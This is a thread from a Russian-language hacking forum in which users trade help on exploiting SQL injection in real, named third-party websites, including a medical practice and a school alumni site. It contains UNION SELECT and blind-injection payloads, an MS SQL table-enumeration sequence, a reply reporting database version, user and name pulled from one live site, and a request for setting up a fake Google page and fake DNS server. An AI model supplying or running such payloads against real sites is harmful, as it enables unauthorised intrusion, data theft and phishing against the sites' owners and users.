Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    почему это не показывают, введенный номер?

    http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+

    http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring(version(),1,1)=5

    крути как blind
     
    _________________________
  3. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    PHP:
    $server=mysql_real_escape_string($_GET["server_name"]);
    $query mysql_query("SELECT `player_id` FROM `".$config->db_prefix."_bans` WHERE `player_id`='".$server."' AND `expired`=0") or die (mysql_error());
    Что можно сделать, что бы выдалась ошибка?
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    да ничё какбы не сделаешь)
     
  5. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    изменение контекста страницы.

    ex.

    order+by+1 -- страница загружается

    order+by+100 -- Пустая страница
     
    _________________________
    #14086 Konqi, 12 Jul 2010
    Last edited: 12 Jul 2010
    1 person likes this.
  7. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
  8. happygirl

    happygirl New Member

    Joined:
    10 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Пожалуйста, помогите как вводить этот сайт?



    http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'

    http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977# <-true
     
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Я сомневаюсь что она там есть, там просто нет проверки mysql_num_rows. ИМХО
     
  10. mikhalev

    mikhalev New Member

    Joined:
    16 May 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Как использовать уязвимость в SharePoint ??? Примерчик можно ...???
     
  11. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет
    Есть SQL инъекция
    Code:
    site.ru/index.php&name=1'
    Поле name уязвимо

    Если запрос прошел успешно то в браузере высвечивается 1 если еррор то 0
    Известно что база MS SQL

    Можно ли провести Blind SQL-inj? если да то подскажите статью как сделать это на MS SQL
    Можно ли отправить запрос типа INSERT или UPDATE или еще что-то подобное чтоб проникнуть на сервер или изменить/создать данные в базе
     
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    2Byrger
    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    потом

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 2+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    потом

    1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+where+TABLE_NAME+NOT+IN+((SELECT+TOP+ 3+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES))--

    и т.д.
    (c) scipio
    http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
    https://forum.antichat.ru/showthread.php?t=30501
     
    _________________________
    #14092 shell_c0de, 13 Jul 2010
    Last edited: 13 Jul 2010
  13. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://hotflation.com/myprofile.php?uid=185+and+1=1

    а вот тут что можно придумать?
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    я одного не понимаю, что ты ждешь? что бы за тебя раскрутили скулю?задолбали таки вопросы ..тут стандартная скуль, сам и раскручивай... тщательно не рекомендую никому помогать данному индивидууму, за него скуль раскручивай , а он перед своими одноклассниками будет крутым хацкером...думаю предложить за такое сразу в бан посылать.сколько таких умников которые подставляют ковычку..и постят здесь результат..и жалобно поют помочь им, а мануалы кто читать будет?

    Version:5.1.47
    User:hflation_hf@localhost
    Database:hflation_hf

    поставь перед собой вопрос как узнать инфу которую я узнал...а не ныть здесь что бы за тебя все сделали...
     
    #14094 Gorev, 13 Jul 2010
    Last edited: 13 Jul 2010
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Я же говорю что сайт явных ощибок не выдает так что обычная инъекция в MS SQL Не катит там где в ошибке выводится имя таблиц и так далее

    Сайт сообщает только о вверном или не верном запросе
     
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Подскажите, как правильно настроить фейковую страничку www.google.ru

    Экспериментирую на своем компе, прописываю в файле C:\windows\system32\drivers\etc\hosts

    www.google.ru 1111.2222.3333.4444

    http://google.ru/ 1111.2222.3333.4444

    Все ровно попадаю на настоящую страничку www.google.ru

    И. если можно дайте ссылку, как настроить фейковый DNS сервер.
     
  17. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    ну зачем же сразу наезжать

    я вот честно говоря не пойму, как ее раскручивать,
    order by & group by не работают вроде. поэтому и спрашиваю, как крутить. вот и ставлю вопрос, как ты раскрутил?

    ну нуб я и что в этом плохого. кто нубом не был?
     
    #14097 durito, 13 Jul 2010
    Last edited: 13 Jul 2010
  18. R0nin

    R0nin Member

    Joined:
    11 Jul 2010
    Messages:
    261
    Likes Received:
    24
    Reputations:
    8
    Ты даже не знаешь как выглядет формат IPv4, иди вот тут прочитай http://en.wikipedia.org/wiki/IPv4 что это такое, а я тебе потом помогу настроить твой hosts.
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    у мeня работает ордер бай а у тебя нет...великий дух мускуля меня боится и дает доступ..а вот тебя определил и сразу послал ... я кажется тебе ясно сказал..читай мануалы..
     
  20. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    помогите кто с cfm
    Code:
    http://www.vaemergency.com/train/calendar_course.cfm?id=156
    
     
Thread Status:
Not open for further replies.